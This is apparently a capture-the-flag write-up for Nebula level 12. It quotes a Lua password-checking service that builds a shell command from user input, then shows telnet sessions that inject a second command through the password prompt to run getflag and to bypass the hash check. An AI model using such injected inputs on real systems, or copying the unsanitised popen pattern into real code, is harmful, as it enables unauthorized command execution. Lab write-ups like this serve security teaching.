There is a backdoor process listening on port 50001.
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))
function hash(password)
prog = io.popen("echo "..password.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local line, err = client:receive()
if not err then
print("trying " .. line) -- log from where ;\
local h = hash(line)
if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
client:send("Better luck next time\n");
else
client:send("Congrats, your token is 413**CARRIER LOST**\n")
end
end
client:close()
end
My experience with Lua is minimal at best, but it’s pretty obvious that the hash() function calls a shell command, and allows for command injection.
To run getflag is very simple:
level12@nebula:~$ telnet 127.0.0.1 50001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Password: 1;/bin/getflag > /tmp/level12;echo 1 Better luck next time Connection closed by foreign host. level12@nebula:~$ cat /tmp/level12 You have successfully executed getflag on a target account
And if you want to pass the check for the hash for fun, it is also simple:
level12@nebula:~$ telnet 127.0.0.1 50001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Password: 4754a4f4bd5787accd33de887b9250a0691dd198;echo 1 Congrats, your token is 413**CARRIER LOST** Connection closed by foreign host.